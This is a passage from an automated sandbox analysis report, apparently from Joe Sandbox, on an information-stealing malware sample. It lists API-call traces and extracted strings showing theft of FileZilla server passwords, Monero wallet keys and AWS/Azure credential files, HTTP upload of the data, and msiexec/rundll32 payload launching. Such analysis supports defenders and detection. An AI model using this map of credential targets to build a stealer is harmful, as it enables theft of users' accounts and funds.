                              • Associated: 00000000.00000002.2084582320.0000000000AEA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2085054907.0000000000AFE000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2085054907.0000000000C8A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2085054907.0000000000D6D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2085054907.0000000000D92000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2085054907.0000000000D9C000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2085054907.0000000000DAA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2086118949.0000000000DAB000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2086265926.0000000000F4D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2086287887.0000000000F4E000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8a0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                              • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                              • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                              • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                              APIs
                                • Part of subcall function 008BA740: lstrcpy.KERNEL32(008C0E17,00000000), ref: 008BA788
                                • Part of subcall function 008B8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 008B8E0B
                                • Part of subcall function 008BA920: lstrcpy.KERNEL32(00000000,?), ref: 008BA972
                                • Part of subcall function 008BA920: lstrcat.KERNEL32(00000000), ref: 008BA982
                                • Part of subcall function 008BA8A0: lstrcpy.KERNEL32(?,008C0E17), ref: 008BA905
                                • Part of subcall function 008BA9B0: lstrlen.KERNEL32(?,01428900,?,\Monero\wallet.keys,008C0E17), ref: 008BA9C5
                                • Part of subcall function 008BA9B0: lstrcpy.KERNEL32(00000000), ref: 008BAA04
                                • Part of subcall function 008BA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 008BAA12
                                • Part of subcall function 008BA7A0: lstrcpy.KERNEL32(?,00000000), ref: 008BA7E6
                                • Part of subcall function 008A99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 008A99EC
                                • Part of subcall function 008A99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 008A9A11
                                • Part of subcall function 008A99C0: LocalAlloc.KERNEL32(00000040,?), ref: 008A9A31
                                • Part of subcall function 008A99C0: ReadFile.KERNEL32(000000FF,?,00000000,008A148F,00000000), ref: 008A9A5A
                                • Part of subcall function 008A99C0: LocalFree.KERNEL32(008A148F), ref: 008A9A90
                                • Part of subcall function 008A99C0: CloseHandle.KERNEL32(000000FF), ref: 008A9A9A
                                • Part of subcall function 008B8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 008B8E52
                              • GetProcessHeap.KERNEL32(00000000,000F423F,008C0DBA,008C0DB7,008C0DB6,008C0DB3), ref: 008B0362
                              • RtlAllocateHeap.NTDLL(00000000), ref: 008B0369
                              • StrStrA.SHLWAPI(00000000,<Host>), ref: 008B0385
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,008C0DB2), ref: 008B0393
                              • StrStrA.SHLWAPI(00000000,<Port>), ref: 008B03CF
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,008C0DB2), ref: 008B03DD
                              • StrStrA.SHLWAPI(00000000,<User>), ref: 008B0419
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,008C0DB2), ref: 008B0427
                              • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 008B0463
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,008C0DB2), ref: 008B0475
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,008C0DB2), ref: 008B0502
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,008C0DB2), ref: 008B051A
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,008C0DB2), ref: 008B0532
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,008C0DB2), ref: 008B054A
                              • lstrcat.KERNEL32(?,browser: FileZilla), ref: 008B0562
                              • lstrcat.KERNEL32(?,profile: null), ref: 008B0571
                              • lstrcat.KERNEL32(?,url: ), ref: 008B0580
                              • lstrcat.KERNEL32(?,00000000), ref: 008B0593
                              • lstrcat.KERNEL32(?,008C1678), ref: 008B05A2
                              • lstrcat.KERNEL32(?,00000000), ref: 008B05B5
                              • lstrcat.KERNEL32(?,008C167C), ref: 008B05C4
                              • lstrcat.KERNEL32(?,login: ), ref: 008B05D3
                              • lstrcat.KERNEL32(?,00000000), ref: 008B05E6
                              • lstrcat.KERNEL32(?,008C1688), ref: 008B05F5
                              • lstrcat.KERNEL32(?,password: ), ref: 008B0604
                              • lstrcat.KERNEL32(?,00000000), ref: 008B0617
                              • lstrcat.KERNEL32(?,008C1698), ref: 008B0626
                              • lstrcat.KERNEL32(?,008C169C), ref: 008B0635
                              • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,008C0DB2), ref: 008B068E
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2084582320.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                              Yara matches
                              Similarity
                              • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                              • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                              • API String ID: 1942843190-555421843
                              • Opcode ID: f3116e5c8695dd53665b31b3e8510350e72040893dd3854d15a19aa1c54edc22
                              • Instruction ID: 08ae1e4de1ac99f5262241dd893bbbffbf661f28d4e7f72a68360b596706b92d
                              • Opcode Fuzzy Hash: f3116e5c8695dd53665b31b3e8510350e72040893dd3854d15a19aa1c54edc22
                              • Instruction Fuzzy Hash: 84D11071900208ABDB08EBF8DD96EEE7778FF24700F544518F112E6291DF74AA46CB62
                              APIs
                                • Part of subcall function 008BA7A0: lstrcpy.KERNEL32(?,00000000), ref: 008BA7E6
                                • Part of subcall function 008A47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 008A4839
                                • Part of subcall function 008A47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 008A4849
                                • Part of subcall function 008BA740: lstrcpy.KERNEL32(008C0E17,00000000), ref: 008BA788
                              • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 008A59F8
                              • StrCmpCA.SHLWAPI(?,0142F028), ref: 008A5A13
                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 008A5B93
                              • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,0142F098,00000000,?,01429CE8,00000000,?,008C1A1C), ref: 008A5E71
                              • lstrlen.KERNEL32(00000000), ref: 008A5E82
                              • GetProcessHeap.KERNEL32(00000000,?), ref: 008A5E93
                              • RtlAllocateHeap.NTDLL(00000000), ref: 008A5E9A
                              • lstrlen.KERNEL32(00000000), ref: 008A5EAF
                              • lstrlen.KERNEL32(00000000), ref: 008A5ED8
                              • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 008A5EF1
                              • lstrlen.KERNEL32(00000000,?,?), ref: 008A5F1B
                              • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 008A5F2F
                              • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 008A5F4C
                              • InternetCloseHandle.WININET(00000000), ref: 008A5FB0
                              • InternetCloseHandle.WININET(00000000), ref: 008A5FBD
                              • HttpOpenRequestA.WININET(00000000,0142F038,?,0142EB78,00000000,00000000,00400100,00000000), ref: 008A5BF8
                                • Part of subcall function 008BA9B0: lstrlen.KERNEL32(?,01428900,?,\Monero\wallet.keys,008C0E17), ref: 008BA9C5
                                • Part of subcall function 008BA9B0: lstrcpy.KERNEL32(00000000), ref: 008BAA04
                                • Part of subcall function 008BA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 008BAA12
                                • Part of subcall function 008BA8A0: lstrcpy.KERNEL32(?,008C0E17), ref: 008BA905
                                • Part of subcall function 008BA920: lstrcpy.KERNEL32(00000000,?), ref: 008BA972
                                • Part of subcall function 008BA920: lstrcat.KERNEL32(00000000), ref: 008BA982
                              • InternetCloseHandle.WININET(00000000), ref: 008A5FC7
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2084582320.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                              Yara matches
                              Similarity
                              • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                              • String ID: "$"$------$------$------
                              • API String ID: 874700897-2180234286
                              • Opcode ID: 522aa51892b073468585083d2333105e5de20b1091bfe9f494b4e5bb691e5b8a
                              • Instruction ID: 9742a5b78a02ebb763496a27bb2fbcbcb5b14872c52cbb84525f26bf637a8e46
                              • Opcode Fuzzy Hash: 522aa51892b073468585083d2333105e5de20b1091bfe9f494b4e5bb691e5b8a
                              • Instruction Fuzzy Hash: F9121171820118BADB19EBA4DCD5FEEB378FF14700F404169B106E66A1DF706A4ACF66
                              APIs
                                • Part of subcall function 008BA740: lstrcpy.KERNEL32(008C0E17,00000000), ref: 008BA788
                                • Part of subcall function 008BA9B0: lstrlen.KERNEL32(?,01428900,?,\Monero\wallet.keys,008C0E17), ref: 008BA9C5
                                • Part of subcall function 008BA9B0: lstrcpy.KERNEL32(00000000), ref: 008BAA04
                                • Part of subcall function 008BA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 008BAA12
                                • Part of subcall function 008BA8A0: lstrcpy.KERNEL32(?,008C0E17), ref: 008BA905
                                • Part of subcall function 008B8B60: GetSystemTime.KERNEL32(008C0E1A,01429D18,008C05AE,?,?,008A13F9,?,0000001A,008C0E1A,00000000,?,01428900,?,\Monero\wallet.keys,008C0E17), ref: 008B8B86
                                • Part of subcall function 008BA920: lstrcpy.KERNEL32(00000000,?), ref: 008BA972
                                • Part of subcall function 008BA920: lstrcat.KERNEL32(00000000), ref: 008BA982
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 008ACF83
                              • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 008AD0C7
                              • RtlAllocateHeap.NTDLL(00000000), ref: 008AD0CE
                              • lstrcat.KERNEL32(?,00000000), ref: 008AD208
                              • lstrcat.KERNEL32(?,008C1478), ref: 008AD217
                              • lstrcat.KERNEL32(?,00000000), ref: 008AD22A
                              • lstrcat.KERNEL32(?,008C147C), ref: 008AD239
                              • lstrcat.KERNEL32(?,00000000), ref: 008AD24C
                              • lstrcat.KERNEL32(?,008C1480), ref: 008AD25B
                              • lstrcat.KERNEL32(?,00000000), ref: 008AD26E
                              • lstrcat.KERNEL32(?,008C1484), ref: 008AD27D
                              • lstrcat.KERNEL32(?,00000000), ref: 008AD290
                              • lstrcat.KERNEL32(?,008C1488), ref: 008AD29F
                              • lstrcat.KERNEL32(?,00000000), ref: 008AD2B2
                              • lstrcat.KERNEL32(?,008C148C), ref: 008AD2C1
                              • lstrcat.KERNEL32(?,00000000), ref: 008AD2D4
                              • lstrcat.KERNEL32(?,008C1490), ref: 008AD2E3
                                • Part of subcall function 008BA820: lstrlen.KERNEL32(008A4F05,?,?,008A4F05,008C0DDE), ref: 008BA82B
                                • Part of subcall function 008BA820: lstrcpy.KERNEL32(008C0DDE,00000000), ref: 008BA885
                              • lstrlen.KERNEL32(?), ref: 008AD32A
                              • lstrlen.KERNEL32(?), ref: 008AD339
                                • Part of subcall function 008BAA70: StrCmpCA.SHLWAPI(01428860,008AA7A7,?,008AA7A7,01428860), ref: 008BAA8F
                              • DeleteFileA.KERNEL32(00000000), ref: 008AD3B4
                              Memory Dump Source
                              • Source File: 00000000.00000002.2084582320.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                              Yara matches
                              Similarity
                              • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                              • String ID:
                              • API String ID: 1956182324-0
                              • Opcode ID: 1352239cc9a3187aa0fced0052b8b40b848d8d7e9e01c49086595dd64260357d
                              • Instruction ID: fa1db374250c84be8f5af2f9c57768b2393c53991daffbfc632dff96394f2425
                              • Opcode Fuzzy Hash: 1352239cc9a3187aa0fced0052b8b40b848d8d7e9e01c49086595dd64260357d
                              • Instruction Fuzzy Hash: 4EE1FA71910108ABDB18EBA4DD96EEE7778FF24301F104168F106F66A1DE35AA06CB67
                              APIs
                                • Part of subcall function 008BA740: lstrcpy.KERNEL32(008C0E17,00000000), ref: 008BA788
                                • Part of subcall function 008BA920: lstrcpy.KERNEL32(00000000,?), ref: 008BA972
                                • Part of subcall function 008BA920: lstrcat.KERNEL32(00000000), ref: 008BA982
                                • Part of subcall function 008BA8A0: lstrcpy.KERNEL32(?,008C0E17), ref: 008BA905
                                • Part of subcall function 008BA9B0: lstrlen.KERNEL32(?,01428900,?,\Monero\wallet.keys,008C0E17), ref: 008BA9C5
                                • Part of subcall function 008BA9B0: lstrcpy.KERNEL32(00000000), ref: 008BAA04
                                • Part of subcall function 008BA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 008BAA12
                              • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,0142C7B8,00000000,?,008C144C,00000000,?,?), ref: 008ACA6C
                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 008ACA89
                              • GetFileSize.KERNEL32(00000000,00000000), ref: 008ACA95
                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 008ACAA8
                              • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 008ACAD9
                              • StrStrA.SHLWAPI(?,0142C860,008C0B52), ref: 008ACAF7
                              • StrStrA.SHLWAPI(00000000,0142C788), ref: 008ACB1E
                              • StrStrA.SHLWAPI(?,0142D210,00000000,?,008C1458,00000000,?,00000000,00000000,?,014286E0,00000000,?,008C1454,00000000,?), ref: 008ACCA2
                              • StrStrA.SHLWAPI(00000000,0142D190), ref: 008ACCB9
                                • Part of subcall function 008AC820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 008AC871
                                • Part of subcall function 008AC820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 008AC87C
                              • StrStrA.SHLWAPI(?,0142D190,00000000,?,008C145C,00000000,?,00000000,01428720), ref: 008ACD5A
                              • StrStrA.SHLWAPI(00000000,01428880), ref: 008ACD71
                                • Part of subcall function 008AC820: lstrcat.KERNEL32(?,008C0B46), ref: 008AC943
                                • Part of subcall function 008AC820: lstrcat.KERNEL32(?,008C0B47), ref: 008AC957
                                • Part of subcall function 008AC820: lstrcat.KERNEL32(?,008C0B4E), ref: 008AC978
                              • lstrlen.KERNEL32(00000000), ref: 008ACE44
                              • CloseHandle.KERNEL32(00000000), ref: 008ACE9C
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2084582320.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                              Yara matches
                              Similarity
                              • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                              • String ID:
                              • API String ID: 3744635739-3916222277
                              • Opcode ID: 99ba3bb1670f25c514c0625b78c9a2c88d666ec910bf2e5607bbdfc0d1a1bbb2
                              • Instruction ID: 650d41e3d8523f4109dc85a9bd3b07b63ae71ab2bb752681fe7c224bea7520fa
                              • Opcode Fuzzy Hash: 99ba3bb1670f25c514c0625b78c9a2c88d666ec910bf2e5607bbdfc0d1a1bbb2
                              • Instruction Fuzzy Hash: F5E1ED71900108BBDB18EBA8DC95FEEB778FF14300F404169F516E6691EF346A4ACB66
                              APIs
                                • Part of subcall function 008BA740: lstrcpy.KERNEL32(008C0E17,00000000), ref: 008BA788
                              • RegOpenKeyExA.ADVAPI32(00000000,0142A838,00000000,00020019,00000000,008C05B6), ref: 008B83A4
                              • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 008B8426
                              • wsprintfA.USER32 ref: 008B8459
                              • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 008B847B
                              • RegCloseKey.ADVAPI32(00000000), ref: 008B848C
                              • RegCloseKey.ADVAPI32(00000000), ref: 008B8499
                                • Part of subcall function 008BA7A0: lstrcpy.KERNEL32(?,00000000), ref: 008BA7E6
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2084582320.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                              Yara matches
                              Similarity
                              • API ID: CloseOpenlstrcpy$Enumwsprintf
                              • String ID: - $%s\%s$?
                              • API String ID: 3246050789-3278919252
                              • Opcode ID: f6ac9dbb0f733910f3b43bed21afe7258cdfe4d60ef6bbf5472af3785708aaa8
                              • Instruction ID: 278e2d59452c7798698de0d7337d4ee25a838119ba183b946a2491dc89487728
                              • Opcode Fuzzy Hash: f6ac9dbb0f733910f3b43bed21afe7258cdfe4d60ef6bbf5472af3785708aaa8
                              • Instruction Fuzzy Hash: D981FC71910118ABDB28DB54CC95FEAB7B8FF18700F008299E10AE6250DF756B86CFA5
                              APIs
                                • Part of subcall function 008B8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 008B8E0B
                              • lstrcat.KERNEL32(?,00000000), ref: 008B4DB0
                              • lstrcat.KERNEL32(?,\.azure\), ref: 008B4DCD
                                • Part of subcall function 008B4910: wsprintfA.USER32 ref: 008B492C
                                • Part of subcall function 008B4910: FindFirstFileA.KERNEL32(?,?), ref: 008B4943
                              • lstrcat.KERNEL32(?,00000000), ref: 008B4E3C
                              • lstrcat.KERNEL32(?,\.aws\), ref: 008B4E59
                                • Part of subcall function 008B4910: StrCmpCA.SHLWAPI(?,008C0FDC), ref: 008B4971
                                • Part of subcall function 008B4910: StrCmpCA.SHLWAPI(?,008C0FE0), ref: 008B4987
                                • Part of subcall function 008B4910: FindNextFileA.KERNEL32(000000FF,?), ref: 008B4B7D
                                • Part of subcall function 008B4910: FindClose.KERNEL32(000000FF), ref: 008B4B92
                              • lstrcat.KERNEL32(?,00000000), ref: 008B4EC8
                              • lstrcat.KERNEL32(?,\.IdentityService\), ref: 008B4EE5
                                • Part of subcall function 008B4910: wsprintfA.USER32 ref: 008B49B0
                                • Part of subcall function 008B4910: StrCmpCA.SHLWAPI(?,008C08D2), ref: 008B49C5
                                • Part of subcall function 008B4910: wsprintfA.USER32 ref: 008B49E2
                                • Part of subcall function 008B4910: PathMatchSpecA.SHLWAPI(?,?), ref: 008B4A1E
                                • Part of subcall function 008B4910: lstrcat.KERNEL32(?,0142F0D8), ref: 008B4A4A
                                • Part of subcall function 008B4910: lstrcat.KERNEL32(?,008C0FF8), ref: 008B4A5C
                                • Part of subcall function 008B4910: lstrcat.KERNEL32(?,?), ref: 008B4A70
                                • Part of subcall function 008B4910: lstrcat.KERNEL32(?,008C0FFC), ref: 008B4A82
                                • Part of subcall function 008B4910: lstrcat.KERNEL32(?,?), ref: 008B4A96
                                • Part of subcall function 008B4910: CopyFileA.KERNEL32(?,?,00000001), ref: 008B4AAC
                                • Part of subcall function 008B4910: DeleteFileA.KERNEL32(?), ref: 008B4B31
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2084582320.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                              • Associated: 00000000.00000002.2084561032.00000000008A0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2084582320.0000000000951000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2084582320.000000000095D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2084582320.0000000000982000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2084582320.0000000000AEA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2085054907.0000000000AFE000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2085054907.0000000000C8A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2085054907.0000000000D6D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2085054907.0000000000D92000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2085054907.0000000000D9C000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2085054907.0000000000DAA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2086118949.0000000000DAB000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2086265926.0000000000F4D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2086287887.0000000000F4E000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8a0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                              • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                              • API String ID: 949356159-974132213
                              • Opcode ID: 8b89cc8e2dbd4608c7ca2f1e38955467056c78fa6b7f9f9b9841f43233a41b48
                              • Instruction ID: 3fd4e5d104a15de876efc7a6fad32f3806ad9c38c72c05dc933965d9c578a9b3
                              • Opcode Fuzzy Hash: 8b89cc8e2dbd4608c7ca2f1e38955467056c78fa6b7f9f9b9841f43233a41b48
                              • Instruction Fuzzy Hash: 5741837A94020467DB64F770DC8BFDD7238FB25700F004458B695E62C2EEB49B898B93
                              APIs
                              • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 008B906C
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2084582320.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                              • Associated: 00000000.00000002.2084561032.00000000008A0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2084582320.0000000000951000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2084582320.000000000095D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2084582320.0000000000982000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2084582320.0000000000AEA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2085054907.0000000000AFE000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2085054907.0000000000C8A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2085054907.0000000000D6D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2085054907.0000000000D92000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2085054907.0000000000D9C000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2085054907.0000000000DAA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2086118949.0000000000DAB000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2086265926.0000000000F4D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2086287887.0000000000F4E000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8a0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: CreateGlobalStream
                              • String ID: image/jpeg
                              • API String ID: 2244384528-3785015651
                              • Opcode ID: 095532a67d3eb889c82fbf6dcb398538547a4339dcd07dd664e9ead6289558cf
                              • Instruction ID: 58b71472f9a55c09612168f866852746ebb6584857d7da558bdaa89e2d1ac333
                              • Opcode Fuzzy Hash: 095532a67d3eb889c82fbf6dcb398538547a4339dcd07dd664e9ead6289558cf
                              • Instruction Fuzzy Hash: 1271BAB5910208ABDB04EFE4DC89FEEB7B9FB58700F108518F615EB290DB34A945CB61
                              APIs
                                • Part of subcall function 008BA740: lstrcpy.KERNEL32(008C0E17,00000000), ref: 008BA788
                              • ShellExecuteEx.SHELL32(0000003C), ref: 008B31C5
                              • ShellExecuteEx.SHELL32(0000003C), ref: 008B335D
                              • ShellExecuteEx.SHELL32(0000003C), ref: 008B34EA
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2084582320.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                              • Associated: 00000000.00000002.2084561032.00000000008A0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2084582320.0000000000951000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2084582320.000000000095D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2084582320.0000000000982000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2084582320.0000000000AEA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2085054907.0000000000AFE000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2085054907.0000000000C8A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2085054907.0000000000D6D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2085054907.0000000000D92000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2085054907.0000000000D9C000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2085054907.0000000000DAA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2086118949.0000000000DAB000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2086265926.0000000000F4D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2086287887.0000000000F4E000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8a0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExecuteShell$lstrcpy
                              • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                              • API String ID: 2507796910-3625054190
                              • Opcode ID: fba263a8d887c0580760cab14723a49485ef120eec6685dc51805412bea19921
                              • Instruction ID: 4bf468df2b9615da6fc2d41fc84afc00d3b570feec6fab6609986e3798ccde4e
                              • Opcode Fuzzy Hash: fba263a8d887c0580760cab14723a49485ef120eec6685dc51805412bea19921
                              • Instruction Fuzzy Hash: EE12ED71810108AADB19EBA4DC92FEEB778FF14300F504169F516A6691EF346B4ACF63
                              APIs
                                • Part of subcall function 008BA7A0: lstrcpy.KERNEL32(?,00000000), ref: 008BA7E6
                                • Part of subcall function 008A6280: InternetOpenA.WININET(008C0DFE,00000001,00000000,00000000,00000000), ref: 008A62E1
                                • Part of subcall function 008A6280: StrCmpCA.SHLWAPI(?,0142F028), ref: 008A6303
                                • Part of subcall function 008A6280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 008A6335
                                • Part of subcall function 008A6280: HttpOpenRequestA.WININET(00000000,GET,?,0142EB78,00000000,00000000,00400100,00000000), ref: 008A6385
                                • Part of subcall function 008A6280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 008A63BF
                                • Part of subcall function 008A6280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 008A63D1
                                • Part of subcall function 008BA8A0: lstrcpy.KERNEL32(?,008C0E17), ref: 008BA905
                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 008B5318
                              • lstrlen.KERNEL32(00000000), ref: 008B532F
                                • Part of subcall function 008B8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 008B8E52
                              • StrStrA.SHLWAPI(00000000,00000000), ref: 008B5364
                              • lstrlen.KERNEL32(00000000), ref: 008B5383
                              • lstrlen.KERNEL32(00000000), ref: 008B53AE
                                • Part of subcall function 008BA740: lstrcpy.KERNEL32(008C0E17,00000000), ref: 008BA788
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2084582320.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                              • Associated: 00000000.00000002.2084561032.00000000008A0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2084582320.0000000000951000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2084582320.000000000095D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2084582320.0000000000982000.00000040.00000001.01000000.00000003.sdmp
